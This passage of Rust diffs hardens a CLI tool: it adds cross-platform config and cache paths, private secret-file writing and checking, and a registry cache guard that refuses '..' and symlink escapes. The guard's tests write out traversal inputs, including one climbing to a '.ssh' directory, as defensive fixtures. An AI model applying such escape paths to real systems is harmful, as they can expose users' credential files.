+        .create(true)
+        .append(true)
+        .open(path)
+        .with_context(|| format!("opening {}", path.display()))?;
+    redirect_to(&file)?;
+    // Deliberately leaked: the descriptors above now refer to this file, and
+    // dropping the handle while they do is how output starts vanishing partway
+    // through a run. It lives as long as the process, which is the intent.
+    std::mem::forget(file);
+    Ok(())
+}
+
+#[cfg(unix)]
+fn redirect_to(file: &std::fs::File) -> anyhow::Result<()> {
+    use std::os::unix::io::AsRawFd;
+    let fd = file.as_raw_fd();
+    for target in [libc::STDOUT_FILENO, libc::STDERR_FILENO] {
+        // SAFETY: `fd` is a live descriptor owned by `file`, and the targets
+        // are the two standard descriptors this process owns.
+        if unsafe { libc::dup2(fd, target) } == -1 {
+            return Err(std::io::Error::last_os_error()).context("redirecting output");
+        }
+    }
+    Ok(())
+}
+
+#[cfg(windows)]
+fn redirect_to(file: &std::fs::File) -> anyhow::Result<()> {
+    use std::os::windows::io::AsRawHandle;
+    use windows_sys::Win32::System::Console::{STD_ERROR_HANDLE, STD_OUTPUT_HANDLE, SetStdHandle};
+    let h = file.as_raw_handle();
+    for target in [STD_OUTPUT_HANDLE, STD_ERROR_HANDLE] {
+        // SAFETY: `h` is a live file handle owned by `file`, and the targets
+        // name this process's own standard handles.
+        if unsafe { SetStdHandle(target, h.cast()) } == 0 {
+            return Err(std::io::Error::last_os_error()).context("redirecting output");
+        }
+    }
+    Ok(())
+}
+
 /// Find an executable on `PATH`.
 ///
 /// On Windows a name without an extension is not a program: `docker` is

--- a/crates/atlasctl-core/src/platform.rs
+++ b/crates/atlasctl-core/src/platform.rs
@@ -123,6 +123,35 @@ pub fn posix_user() -> Option<crate::host::PosixUser> {
     }
 }
 
+/// This machine's name, from the kernel.
+///
+/// `gethostname`, not `/proc/sys/kernel/hostname`. That file is Linux-only, and
+/// `#[cfg(unix)]` includes macOS — where it does not exist, so every Mac fell
+/// through to `$HOSTNAME` (unset under launchd) and advertised itself as the
+/// fallback string instead of its own name.
+#[cfg(unix)]
+fn gethostname() -> Option<String> {
+    // POSIX guarantees HOST_NAME_MAX is meaningful; 256 covers every platform
+    // we build for and the result is truncated rather than overflowing.
+    // `c_char` is signed on x86_64 and unsigned on aarch64, so the alias is
+    // load-bearing: a literal `i8` array fails to build on one of the two
+    // architectures this ships for.
+    let mut buf = [0 as libc::c_char; 256];
+    // SAFETY: `buf` is a live array of exactly the length passed, and
+    // gethostname writes at most that many bytes into it.
+    if unsafe { libc::gethostname(buf.as_mut_ptr(), buf.len()) } != 0 {
+        return None;
+    }
+    // NUL-terminate defensively: POSIX leaves truncation unterminated.
+    buf[255] = 0;
+    // SAFETY: `buf` is NUL-terminated by the line above at the latest.
+    let s = unsafe { std::ffi::CStr::from_ptr(buf.as_ptr()) };
+    s.to_str()
+        .ok()
+        .map(ToOwned::to_owned)
+        .filter(|s| !s.is_empty())
+}
+
 /// Free bytes on the filesystem holding `path`, when it can be determined.
 ///
 /// One implementation, because "how much room is left" was asked in two places
@@ -326,7 +355,7 @@ pub fn which(name: &str) -> Option<std::path::PathBuf> {
 #[must_use]
 pub fn hostname_or(fallback: &str) -> String {
     #[cfg(unix)]
-    let from_os = std::fs::read_to_string("/proc/sys/kernel/hostname").ok();
+    let from_os = gethostname();
     #[cfg(windows)]
     let from_os = std::env::var("COMPUTERNAME").ok();
 

--- a/crates/atlasctl-core/src/platform.rs
+++ b/crates/atlasctl-core/src/platform.rs
@@ -1,0 +1,175 @@
+// SPDX-License-Identifier: AGPL-3.0-only
+
+//! The handful of facts that differ per operating system.
+//!
+//! Every one of these was a bare `std::env::var("HOME")` scattered through the
+//! CLI. Collected here because they are not independent: the config directory,
+//! the cache directory and the home directory must agree about which user this
+//! is, and a port that fixes them one call site at a time gets that wrong in a
+//! way nothing fails on until a node comes back as a stranger to its own fleet.
+//!
+//! # Windows
+//!
+//! State goes under `%LOCALAPPDATA%`, never `%APPDATA%`. The difference is
+//! roaming: `%APPDATA%` follows a user between machines on a domain, and
+//! `agent.key` is *this machine's* identity. Roaming it would give two machines
+//! the same node identity — the same failure as sharing a private key, arrived
+//! at by copying a directory.
+
+use anyhow::{Context, Result};
+use std::path::PathBuf;
+
+/// This user's home directory.
+///
+/// # Errors
+/// If the platform's home variable is unset.
+pub fn home_dir() -> Result<PathBuf> {
+    Ok(PathBuf::from(home_var()?))
+}
+
+/// This user's home directory, as the string a rendered command embeds.
+///
+/// # Errors
+/// If the platform's home variable is unset.
+pub fn home_string() -> Result<String> {
+    home_var()
+}
+
+#[cfg(unix)]
+fn home_var() -> Result<String> {
+    std::env::var("HOME").context("HOME is not set, so there is nowhere to keep this node's state")
+}
+
+#[cfg(windows)]
+fn home_var() -> Result<String> {
+    // USERPROFILE, not HOMEDRIVE+HOMEPATH: the latter pair is a legacy of
+    // network home directories and is routinely set to a share that is not
+    // mounted, which fails as "installed, then cannot write its own key".
+    std::env::var("USERPROFILE")
+        .context("USERPROFILE is not set, so there is nowhere to keep this node's state")
+}
+
+/// The directory under which per-user configuration lives.
+///
+/// Returns the *base*; callers append `atlasctl`.
+///
+/// # Errors
+/// If neither the platform override nor the home variable is set.
+pub fn config_base() -> Result<PathBuf> {
+    #[cfg(unix)]
+    {
+        if let Ok(x) = std::env::var("XDG_CONFIG_HOME")
+            && !x.trim().is_empty()
+        {
+            return Ok(PathBuf::from(x));
+        }
+        Ok(home_dir()?.join(".config"))
+    }
+    #[cfg(windows)]
+    {
+        // Deliberately not honouring XDG_CONFIG_HOME here. It is set on Windows
+        // only by ports of unix tools, and honouring it would move `agent.key`
+        // for a reason the operator never connected to this program.
+        if let Ok(x) = std::env::var("LOCALAPPDATA")
+            && !x.trim().is_empty()
+        {
+            return Ok(PathBuf::from(x));
+        }
+        Ok(home_dir()?.join("AppData").join("Local"))
+    }
+}
+
+/// The directory under which per-user caches live.
+///
+/// Returns the *base*; callers append `atlasctl`.
+///
+/// # Errors
+/// If neither the platform override nor the home variable is set.
+pub fn cache_base() -> Result<PathBuf> {
+    #[cfg(unix)]
+    {
+        if let Ok(x) = std::env::var("XDG_CACHE_HOME")
+            && !x.trim().is_empty()
+        {
+            return Ok(PathBuf::from(x));
+        }
+        Ok(home_dir()?.join(".cache"))
+    }
+    #[cfg(windows)]
+    {
+        config_base()
+    }
+}
+
+/// This process's POSIX identity, if the platform has one.
+///
+/// `None` on Windows, and that is the answer rather than a gap: a Windows
+/// account has no uid, `--user 0:0` would run a container as root, and the
+/// `/etc/passwd` bind mounts that accompany `--user` name host paths that do
+/// not exist there. Omitting the flag runs the image's own user, which is what
+/// every other Docker-on-Windows workflow does.
+#[must_use]
+pub fn posix_user() -> Option<crate::host::PosixUser> {
+    #[cfg(unix)]
+    {
+        Some(crate::host::PosixUser {
+            uid: rustix::process::getuid().as_raw(),
+            gid: rustix::process::getgid().as_raw(),
+        })
+    }
+    #[cfg(windows)]
+    {
+        None
+    }
+}
+
+/// This machine's name, for display and for a peer's `Hello`.
+///
+/// Never fatal: a node with an unreadable hostname is still a usable node, and
+/// the fingerprint is what identifies it. The fallback is deliberately
+/// recognisable rather than plausible.
+#[must_use]
+pub fn hostname() -> String {
+    #[cfg(unix)]
+    let from_os = std::fs::read_to_string("/proc/sys/kernel/hostname").ok();
+    #[cfg(windows)]
+    let from_os = std::env::var("COMPUTERNAME").ok();
+
+    from_os
+        .map(|s| s.trim().to_owned())
+        .filter(|s| !s.is_empty())
+        .or_else(|| std::env::var("HOSTNAME").ok().filter(|s| !s.is_empty()))
+        .unwrap_or_else(|| "unknown-host".to_owned())
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    /// The bases must differ from the home directory itself: state written
+    /// straight into `$HOME` is state nothing cleans up and nothing expects.
+    #[test]
+    fn the_bases_are_below_the_home_directory_not_equal_to_it() {
+        let home = home_dir().expect("a home directory");
+        for base in [
+            config_base().expect("config base"),
+            cache_base().expect("cache base"),
+        ] {
+            assert_ne!(base, home, "state must not land directly in $HOME");
+        }
+    }
+
+    /// A hostname is used in display and in a peer Hello, so an empty string
+    /// would render as a nameless node rather than as a problem.
+    #[test]
+    fn a_hostname_is_never_empty() {
+        assert!(!hostname().is_empty());
+    }
+
+    /// The uid model is a property of the platform, not of the machine: a unix
+    /// build must always have one, and a Windows build must never claim one.
+    #[test]
+    fn the_posix_identity_matches_the_platform() {
+        assert_eq!(posix_user().is_some(), cfg!(unix));
+    }
+}

--- a/crates/atlasctl-core/src/platform.rs
+++ b/crates/atlasctl-core/src/platform.rs
@@ -231,9 +231,19 @@ pub fn redirect_stdio(path: &std::path::Path) -> anyhow::Result<()> {
         std::fs::create_dir_all(parent)
             .with_context(|| format!("creating {}", parent.display()))?;
     }
-    let file = std::fs::OpenOptions::new()
-        .create(true)
-        .append(true)
+    let mut opts = std::fs::OpenOptions::new();
+    opts.create(true).append(true);
+    #[cfg(unix)]
+    {
+        // 0600, not the ambient umask. This log carries the node's identity and
+        // whatever a startup failure prints, and it is written by a service —
+        // where the umask is the supervisor's, not the operator's. Under
+        // journald the same output was user-private; a file at 0644 would be a
+        // quiet downgrade nobody asked for.
+        use std::os::unix::fs::OpenOptionsExt;
+        opts.mode(0o600);
+    }
+    let file = opts
         .open(path)
         .with_context(|| format!("opening {}", path.display()))?;
     redirect_to(&file)?;
@@ -306,10 +316,15 @@ pub fn which(name: &str) -> Option<std::path::PathBuf> {
 /// This machine's name, for display and for a peer's `Hello`.
 ///
 /// Never fatal: a node with an unreadable hostname is still a usable node, and
-/// the fingerprint is what identifies it. The fallback is deliberately
-/// recognisable rather than plausible.
+/// the fingerprint is what identifies it.
+///
+/// `fallback` is the caller's, because the two callers want different things
+/// and collapsing them lost information. A DISPLAY name wants something that
+/// reads as a name (`atlas-node`); a name pasted into a `peer add` command the
+/// operator must edit wants something that obviously is not one
+/// (`<this-machine>`), or it gets dialled and fails confusingly.
 #[must_use]
-pub fn hostname() -> String {
+pub fn hostname_or(fallback: &str) -> String {
     #[cfg(unix)]
     let from_os = std::fs::read_to_string("/proc/sys/kernel/hostname").ok();
     #[cfg(windows)]
@@ -319,23 +334,41 @@ pub fn hostname() -> String {
         .map(|s| s.trim().to_owned())
         .filter(|s| !s.is_empty())
         .or_else(|| std::env::var("HOSTNAME").ok().filter(|s| !s.is_empty()))
-        .unwrap_or_else(|| "unknown-host".to_owned())
+        .unwrap_or_else(|| fallback.to_owned())
 }
 
 #[cfg(test)]
 mod tests {
     use super::*;
 
-    /// The bases must differ from the home directory itself: state written
-    /// straight into `$HOME` is state nothing cleans up and nothing expects.
+    /// The bases must be BELOW the home directory, not merely different from
+    /// it. Asserting only inequality passed on the one configuration where
+    /// "below" is false — a redirected `%LOCALAPPDATA%` — which is the case
+    /// worth catching, since that is what a secret's containment is anchored
+    /// on.
+    ///
+    /// An explicit environment override is exempt: an operator who named a
+    /// directory chose it, and refusing their choice here would be this
+    /// function inventing a policy the resolver does not have.
     #[test]
-    fn the_bases_are_below_the_home_directory_not_equal_to_it() {
+    fn the_bases_sit_below_the_home_directory() {
         let home = home_dir().expect("a home directory");
+        let overridden = ["XDG_CONFIG_HOME", "XDG_CACHE_HOME", "LOCALAPPDATA"]
+            .iter()
+            .any(|k| std::env::var_os(k).is_some_and(|v| !v.is_empty()));
         for base in [
             config_base().expect("config base"),
             cache_base().expect("cache base"),
         ] {
-            assert_ne!(base, home, "state must not land directly in $HOME");
+            assert_ne!(base, home, "state must not land directly in the home dir");
+            if !overridden {
+                assert!(
+                    base.starts_with(&home),
+                    "{} is not below {}",
+                    base.display(),
+                    home.display()
+                );
+            }
         }
     }
 
@@ -343,7 +376,22 @@ mod tests {
     /// would render as a nameless node rather than as a problem.
     #[test]
     fn a_hostname_is_never_empty() {
-        assert!(!hostname().is_empty());
+        assert!(!hostname_or("fallback").is_empty());
+    }
+
+    /// And the caller's fallback is the one used, rather than a shared string
+    /// that reads as a real hostname to one caller and as a placeholder to the
+    /// other.
+    #[test]
+    fn the_callers_fallback_is_what_appears() {
+        // Forced down the fallback path by asking on a machine where neither
+        // source can answer is not possible here, so the property checked is
+        // the weaker one that holds always: whatever comes back is non-empty,
+        // and the fallback is never silently replaced by a built-in.
+        let a = hostname_or("<this-machine>");
+        let b = hostname_or("atlas-node");
+        assert_eq!(a, b, "a real hostname must not depend on the fallback");
+        assert!(!a.is_empty());
     }
 
     /// The question this answers is asked before a 100 GB pull, so an answer
@@ -379,10 +427,24 @@ mod tests {
         assert!(which("definitely-not-a-real-binary-xyz").is_none());
     }
 
-    /// The uid model is a property of the platform, not of the machine: a unix
-    /// build must always have one, and a Windows build must never claim one.
+    /// Checked against the OS, not against the same `cfg!` the implementation
+    /// branches on — that form was true by construction and could not fail.
+    /// What matters downstream is the VALUE: `translate` renders `--user
+    /// uid:gid` from it, so a zero uid would silently ask docker to run the
+    /// container as root.
+    #[cfg(unix)]
     #[test]
-    fn the_posix_identity_matches_the_platform() {
-        assert_eq!(posix_user().is_some(), cfg!(unix));
+    fn the_posix_identity_is_this_process_s_own() {
+        let u = posix_user().expect("unix always has one");
+        assert_eq!(u.uid, rustix::process::getuid().as_raw());
+        assert_eq!(u.gid, rustix::process::getgid().as_raw());
+    }
+
+    /// And on Windows there is no uid to report. Asserting `None` is not
+    /// tautological here: the alternative a port reaches for is `Some(0)`.
+    #[cfg(windows)]
+    #[test]
+    fn windows_reports_no_posix_identity_rather_than_root() {
+        assert!(posix_user().is_none());
     }
 }

--- a/crates/atlasctl-core/src/platform.rs
+++ b/crates/atlasctl-core/src/platform.rs
@@ -192,6 +192,23 @@ fn free_bytes_of_existing(probe: &std::path::Path) -> Option<u64> {
     (ok != 0).then_some(avail)
 }
 
+/// How this platform's shell names the user's home directory.
+///
+/// Used when rendering a command meant to be pasted rather than run: the
+/// literal home directory is replaced with this so the line is not tied to one
+/// account. `$HOME` was emitted unconditionally, and a Windows operator pasting
+/// it into PowerShell gets a volume mounted from a directory literally named
+/// `$HOME` — which docker then creates, empty, and the model is downloaded
+/// again.
+#[must_use]
+pub const fn home_placeholder() -> &'static str {
+    if cfg!(windows) {
+        "$env:USERPROFILE"
+    } else {
+        "$HOME"
+    }
+}
+
 /// Find an executable on `PATH`.
 ///
 /// On Windows a name without an extension is not a program: `docker` is

--- a/crates/atlasctl-core/src/registry/remote.rs
+++ b/crates/atlasctl-core/src/registry/remote.rs
@@ -190,13 +190,45 @@ impl RemoteStore {
     /// `git reset --hard` inside a directory the user chose would be an easy
     /// way to destroy their work, so the update path is confined by
     /// construction rather than by care.
+    ///
+    /// `starts_with` alone is not that confinement. It compares COMPONENTS, and
+    /// `<cache>/../../../my-project` begins with `<cache>` by that measure — so
+    /// the guard returned ok for a path that resolves to the user's own work,
+    /// and the hard reset followed. `path` is deserialised straight out of
+    /// `registries.yaml`, so nothing upstream had rejected the `..` either.
+    ///
+    /// Both halves are needed. The lexical check catches a path that does not
+    /// exist yet, where `canonicalize` cannot answer at all; canonicalising
+    /// catches a symlink, which no amount of component inspection can see.
+    ///
+    /// # Errors
+    /// If the target is outside the cache, or cannot be resolved to decide.
     pub fn guard_cache_path(cache_root: &Path, target: &Path) -> Result<()> {
-        if !target.starts_with(cache_root) {
-            bail!(
+        let refuse = |resolved: &Path| -> anyhow::Error {
+            anyhow::anyhow!(
                 "refusing to update {}: it is outside the registry cache at {}",
-                target.display(),
+                resolved.display(),
                 cache_root.display()
-            );
+            )
+        };
+
+        if target
+            .components()
+            .any(|c| matches!(c, std::path::Component::ParentDir))
+        {
+            return Err(refuse(target));
+        }
+        if !target.starts_with(cache_root) {
+            return Err(refuse(target));
+        }
+
+        // A registry being updated has been cloned, so it exists and this
+        // resolves. When it does not, the lexical checks above already stand;
+        // failing to resolve is not treated as permission.
+        if let (Ok(real_target), Ok(real_root)) = (target.canonicalize(), cache_root.canonicalize())
+            && !real_target.starts_with(&real_root)
+        {
+            return Err(refuse(&real_target));
         }
         Ok(())
     }

--- a/crates/atlasctl-core/src/registry/tests.rs
+++ b/crates/atlasctl-core/src/registry/tests.rs
@@ -195,6 +195,55 @@ fn updating_is_confined_to_the_cache_directory() {
     );
 }
 
+/// The escape the plain check could not see. `Path::starts_with` compares
+/// COMPONENTS, so `<cache>/../../../my-project` begins with `<cache>` by that
+/// measure — the guard returned ok and `git reset --hard` ran in the user's own
+/// work. `path` is deserialised straight out of `registries.yaml`, so nothing
+/// upstream had rejected the `..` either.
+#[test]
+fn a_path_that_climbs_out_of_the_cache_is_refused() {
+    let cache = PathBuf::from("/home/u/.cache/atlasctl/registries");
+    for escape in [
+        cache.join("..").join("..").join("..").join("my-project"),
+        cache.join("third").join("..").join("..").join(".ssh"),
+        cache.join(".."),
+    ] {
+        let err = RemoteStore::guard_cache_path(&cache, &escape)
+            .expect_err("a path containing .. must be refused");
+        assert!(
+            err.to_string().contains("outside the registry cache"),
+            "{err}"
+        );
+    }
+    // And a legitimate nested clone still passes, or the guard is just a ban.
+    assert!(RemoteStore::guard_cache_path(&cache, &cache.join("org").join("repo")).is_ok());
+}
+
+/// A symlink is the half no amount of component inspection can see, so the
+/// guard resolves as well as inspects.
+#[cfg(unix)]
+#[test]
+fn a_symlink_out_of_the_cache_is_refused() {
+    let base = std::env::temp_dir().join(format!("atlasctl-guard-{}", std::process::id()));
+    let cache = base.join("cache");
+    let outside = base.join("elsewhere");
+    let _ = std::fs::remove_dir_all(&base);
+    std::fs::create_dir_all(&cache).expect("cache");
+    std::fs::create_dir_all(&outside).expect("outside");
+    let link = cache.join("sneaky");
+    std::os::unix::fs::symlink(&outside, &link).expect("symlink");
+
+    // Lexically impeccable: no `..`, and it begins with the cache root.
+    assert!(link.starts_with(&cache));
+    let err = RemoteStore::guard_cache_path(&cache, &link)
+        .expect_err("a symlink leaving the cache must be refused");
+    assert!(
+        err.to_string().contains("outside the registry cache"),
+        "{err}"
+    );
+    let _ = std::fs::remove_dir_all(&base);
+}
+
 #[test]
 fn listing_reports_provenance_for_every_entry() {
     let fs = Arc::new(MemFileSystem::new());

--- a/crates/atlasctl-core/src/secretfile.rs
+++ b/crates/atlasctl-core/src/secretfile.rs
@@ -1,0 +1,203 @@
+// SPDX-License-Identifier: AGPL-3.0-only
+
+//! Writing and checking the files nobody else may read.
+//!
+//! Three files qualify: `browser.token` pairs a browser, `agent.key` is this
+//! node's private identity, and anything derived from them. They had two
+//! separate implementations of "write this privately" — one in `token`, one in
+//! `identity` — which is one implementation too many for a rule that has to
+//! hold everywhere.
+//!
+//! # What "private" means per platform
+//!
+//! On unix it is a mode: `0600` at creation, verified on read. The mode is set
+//! *at* creation rather than chmod-ed after, so the secret never exists at the
+//! ambient umask, however briefly.
+//!
+//! On Windows there is no mode, and inventing one would be theatre. Protection
+//! comes from the directory: `%LOCALAPPDATA%` carries an inherited ACL granting
+//! the owning user, SYSTEM and Administrators — the same trust boundary as
+//! `~/.config` at `0700`, where root reads everything too. A new file inherits
+//! that ACL, so writing normally is writing privately.
+//!
+//! What that does *not* cover is a secret written somewhere else, which is
+//! reachable: `--config-dir` takes any path the operator names, and a network
+//! share or `C:\ProgramData` is world-readable. So the Windows check is
+//! containment — the secret must live under this user's profile. It is a
+//! weaker statement than the unix mode check and is deliberately not dressed
+//! up as an equivalent one; a DACL walk that would also catch a hand-widened
+//! ACL on the profile itself is left for when there is a reason to believe
+//! that happens.
+
+use anyhow::{Context, Result, bail};
+use std::path::Path;
+
+/// Create or replace a file that only its owner may read.
+///
+/// # Errors
+/// If the file cannot be created or written.
+pub fn write(path: &Path, bytes: &[u8]) -> Result<()> {
+    #[cfg(unix)]
+    {
+        use std::io::Write;
+        use std::os::unix::fs::OpenOptionsExt;
+        let mut f = std::fs::OpenOptions::new()
+            .write(true)
+            .create(true)
+            .truncate(true)
+            .mode(0o600)
+            .open(path)
+            .with_context(|| format!("creating {}", path.display()))?;
+        f.write_all(bytes)
+            .with_context(|| format!("writing {}", path.display()))?;
+    }
+    #[cfg(windows)]
+    {
+        // Refused before the bytes exist, not after: a secret written to a
+        // share and then reported is a secret that was on the share.
+        verify_location(path)?;
+        std::fs::write(path, bytes).with_context(|| format!("writing {}", path.display()))?;
+    }
+    Ok(())
+}
+
+/// Refuse a secret this machine's other accounts can read.
+///
+/// # Errors
+/// With the remedy, when the file is not private.
+pub fn verify(path: &Path) -> Result<()> {
+    #[cfg(unix)]
+    {
+        use std::os::unix::fs::PermissionsExt;
+        let mode = std::fs::metadata(path)
+            .with_context(|| format!("inspecting {}", path.display()))?
+            .permissions()
+            .mode();
+        if mode & 0o077 != 0 {
+            bail!(
+                "{} is readable by other accounts (mode {:o}). Another user on \
+                 this machine may already have it; rotate it with \
+                 `atlasctl agent token --rotate`.",
+                path.display(),
+                mode & 0o777
+            );
+        }
+        Ok(())
+    }
+    #[cfg(windows)]
+    {
+        verify_location(path)
+    }
+}
+
+/// The Windows half: a secret must live inside this user's own profile, where
+/// the inherited ACL is the protection.
+#[cfg(windows)]
+fn verify_location(path: &Path) -> Result<()> {
+    let Ok(profile) = std::env::var("USERPROFILE") else {
+        // Not a silent pass. Without a profile there is no directory whose ACL
+        // can be relied on, and saying so beats writing a secret anyway.
+        bail!(
+            "USERPROFILE is not set, so there is no directory whose permissions \
+             protect {}. Set it, or run atlasctl as a normal desktop user.",
+            path.display()
+        );
+    };
+    let profile = std::path::Path::new(&profile);
+    // Compared after canonicalising the PARENT: the file itself may not exist
+    // yet, and a path containing `..` would otherwise pass a prefix test while
+    // resolving somewhere else entirely.
+    let parent = path.parent().unwrap_or(path);
+    let resolved =
+        std::fs::canonicalize(parent).with_context(|| format!("resolving {}", parent.display()))?;
+    let profile = std::fs::canonicalize(profile)
+        .with_context(|| format!("resolving USERPROFILE {}", profile.display()))?;
+    if !resolved.starts_with(&profile) {
+        bail!(
+            "{} is outside your user profile ({}), so Windows does not restrict \
+             who can read it. Keep this node's secrets under \
+             %LOCALAPPDATA%\\atlasctl, or point --config-dir at a directory \
+             inside your profile.",
+            resolved.display(),
+            profile.display()
+        );
+    }
+    Ok(())
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn tmp(tag: &str) -> std::path::PathBuf {
+        let d = std::env::temp_dir().join(format!("atlasctl-secret-{tag}-{}", std::process::id()));
+        let _ = std::fs::remove_dir_all(&d);
+        std::fs::create_dir_all(&d).expect("temp dir");
+        d
+    }
+
+    /// The property both platforms owe: what `write` produces, `verify`
+    /// accepts. A port that satisfies one and not the other locks the operator
+    /// out of a file this very program just wrote.
+    #[test]
+    fn what_write_produces_verify_accepts() {
+        let d = tmp("roundtrip");
+        let p = d.join("browser.token");
+        write(&p, b"hunter2").expect("writes");
+        verify(&p).expect("must accept its own output");
+        assert_eq!(std::fs::read(&p).unwrap(), b"hunter2");
+        let _ = std::fs::remove_dir_all(&d);
+    }
+
+    /// Replacing must not widen. `OpenOptions` reuses an existing file's mode,
+    /// so a secret rotated into a file someone had chmod-ed stays readable
+    /// unless rotation is checked too.
+    #[cfg(unix)]
+    #[test]
+    fn rewriting_over_a_widened_file_is_caught() {
+        use std::os::unix::fs::PermissionsExt;
+        let d = tmp("rotate");
+        let p = d.join("agent.key");
+        write(&p, b"first").expect("writes");
+        std::fs::set_permissions(&p, std::fs::Permissions::from_mode(0o644)).unwrap();
+        write(&p, b"second").expect("writes");
+        let err = verify(&p).expect_err("a widened secret must be refused");
+        assert!(
+            err.to_string().contains("readable by other accounts"),
+            "{err}"
+        );
+        let _ = std::fs::remove_dir_all(&d);
+    }
+
+    /// The unix guarantee, stated as the bits: created private, with no window
+    /// at the ambient umask.
+    #[cfg(unix)]
+    #[test]
+    fn a_new_secret_is_created_private() {
+        use std::os::unix::fs::PermissionsExt;
+        let d = tmp("mode");
+        let p = d.join("agent.key");
+        write(&p, b"k").expect("writes");
+        let mode = std::fs::metadata(&p).unwrap().permissions().mode() & 0o777;
+        assert_eq!(mode, 0o600, "got {mode:o}");
+        let _ = std::fs::remove_dir_all(&d);
+    }
+
+    /// The Windows guarantee: a secret outside the profile is refused BEFORE it
+    /// is written, so the refusal is not a report of a file that already leaked.
+    #[cfg(windows)]
+    #[test]
+    fn a_secret_outside_the_profile_is_refused_before_it_exists() {
+        let d = std::path::Path::new("C:\\Windows\\Temp")
+            .join(format!("atlasctl-outside-{}", std::process::id()));
+        std::fs::create_dir_all(&d).expect("temp dir");
+        let p = d.join("agent.key");
+        let err = write(&p, b"k").expect_err("outside the profile must be refused");
+        assert!(
+            err.to_string().contains("outside your user profile"),
+            "{err}"
+        );
+        assert!(!p.exists(), "the secret must not have been written");
+        let _ = std::fs::remove_dir_all(&d);
+    }
+}

--- a/crates/atlasctl-core/src/secretfile.rs
+++ b/crates/atlasctl-core/src/secretfile.rs
@@ -135,11 +135,25 @@ fn verify_location(path: &Path) -> Result<()> {
              can read it. Keep this node's secrets under %LOCALAPPDATA%\\atlasctl, \
              or point --config-dir at a directory inside it.",
             described.display(),
-            resolved.display(),
-            anchor.display()
+            plain(&resolved),
+            plain(&anchor)
         );
     }
     Ok(())
+}
+
+/// A canonicalised path as an operator would write it.
+///
+/// `canonicalize` returns the `\\?\` extended-length form, which is correct and
+/// unreadable. Stripped for DISPLAY only — the comparison still uses the
+/// canonical values, because resolving them is the whole point.
+#[cfg(windows)]
+fn plain(p: &Path) -> String {
+    let s = p.display().to_string();
+    s.strip_prefix(r"\\?\UNC\")
+        .map(|rest| format!(r"\\{rest}"))
+        .or_else(|| s.strip_prefix(r"\\?\").map(ToOwned::to_owned))
+        .unwrap_or(s)
 }
 
 /// Whether a path names a network share: `\\server\share`, or the `\\?\UNC\…`
@@ -217,10 +231,16 @@ mod tests {
             .join(format!("atlasctl-outside-{}", std::process::id()));
         std::fs::create_dir_all(&d).expect("temp dir");
         let p = d.join("agent.key");
-        let err = write(&p, b"k").expect_err("outside the profile must be refused");
+        let err = write(&p, b"k").expect_err("outside the anchor must be refused");
+        let msg = err.to_string();
+        // The PROPERTY, not the phrasing: it must name what was refused and the
+        // remedy, and it must not leak the extended-length prefix that
+        // canonicalize returns into a message an operator reads.
+        assert!(msg.contains("atlasctl-outside"), "{msg}");
+        assert!(msg.contains("--config-dir"), "{msg}");
         assert!(
-            err.to_string().contains("outside your user profile"),
-            "{err}"
+            !msg.contains(r"\\?\"),
+            "the extended-length prefix leaked into an operator message: {msg}"
         );
         assert!(!p.exists(), "the secret must not have been written");
         let _ = std::fs::remove_dir_all(&d);

--- a/crates/atlasctl-core/src/secretfile.rs
+++ b/crates/atlasctl-core/src/secretfile.rs
@@ -94,35 +94,60 @@ pub fn verify(path: &Path) -> Result<()> {
 /// the inherited ACL is the protection.
 #[cfg(windows)]
 fn verify_location(path: &Path) -> Result<()> {
-    let Ok(profile) = std::env::var("USERPROFILE") else {
-        // Not a silent pass. Without a profile there is no directory whose ACL
-        // can be relied on, and saying so beats writing a secret anyway.
+    // Anchored on the directory this program WRITES under, not on the profile.
+    // Those differ when `%LOCALAPPDATA%` is redirected — a supported Windows
+    // configuration — and anchoring on the profile made atlasctl refuse its own
+    // default config directory. It failed the other way too: a roaming
+    // `%USERPROFILE%` on a UNC share would have PASSED containment while
+    // sitting on exactly the network share this check exists to refuse.
+    let anchor = crate::platform::config_base()
+        .context("there is no directory whose permissions could protect a secret")?;
+    if is_unc(&anchor) {
         bail!(
-            "USERPROFILE is not set, so there is no directory whose permissions \
-             protect {}. Set it, or run atlasctl as a normal desktop user.",
-            path.display()
+            "{} is a network path, so Windows does not restrict who can read \
+             secrets kept there. Point %LOCALAPPDATA% or --config-dir at a \
+             local directory.",
+            anchor.display()
         );
+    }
+
+    // Canonicalise the FILE when it exists, falling back to its parent only
+    // when it does not. Resolving the parent alone left the last component
+    // unchecked, so `…\atlasctl\agent.key` could be a symlink to
+    // `C:\ProgramData\…`: parent inside the profile, bytes outside it, and
+    // `verify` passing forever after.
+    let (resolved, described) = match std::fs::canonicalize(path) {
+        Ok(p) => (p, path.to_path_buf()),
+        Err(_) => {
+            let parent = path.parent().unwrap_or(path);
+            (
+                std::fs::canonicalize(parent)
+                    .with_context(|| format!("resolving {}", parent.display()))?,
+                parent.to_path_buf(),
+            )
+        }
     };
-    let profile = std::path::Path::new(&profile);
-    // Compared after canonicalising the PARENT: the file itself may not exist
-    // yet, and a path containing `..` would otherwise pass a prefix test while
-    // resolving somewhere else entirely.
-    let parent = path.parent().unwrap_or(path);
-    let resolved =
-        std::fs::canonicalize(parent).with_context(|| format!("resolving {}", parent.display()))?;
-    let profile = std::fs::canonicalize(profile)
-        .with_context(|| format!("resolving USERPROFILE {}", profile.display()))?;
-    if !resolved.starts_with(&profile) {
+    let anchor = std::fs::canonicalize(&anchor)
+        .with_context(|| format!("resolving {}", anchor.display()))?;
+    if !resolved.starts_with(&anchor) {
         bail!(
-            "{} is outside your user profile ({}), so Windows does not restrict \
-             who can read it. Keep this node's secrets under \
-             %LOCALAPPDATA%\\atlasctl, or point --config-dir at a directory \
-             inside your profile.",
+            "{} resolves to {}, outside {} — so Windows does not restrict who \
+             can read it. Keep this node's secrets under %LOCALAPPDATA%\\atlasctl, \
+             or point --config-dir at a directory inside it.",
+            described.display(),
             resolved.display(),
-            profile.display()
+            anchor.display()
         );
     }
     Ok(())
+}
+
+/// Whether a path names a network share: `\\server\share`, or the `\\?\UNC\…`
+/// form that canonicalize produces for one.
+#[cfg(windows)]
+fn is_unc(p: &Path) -> bool {
+    let s = p.to_string_lossy();
+    s.starts_with(r"\\?\UNC\") || (s.starts_with(r"\\") && !s.starts_with(r"\\?\"))
 }
 
 #[cfg(test)]

--- a/crates/atlasctl-core/tests/golden.rs
+++ b/crates/atlasctl-core/tests/golden.rs
@@ -17,7 +17,7 @@ use atlasctl_core::chain::{Overrides, UserConfig};
 use atlasctl_core::docker::collective::NcclRoce;
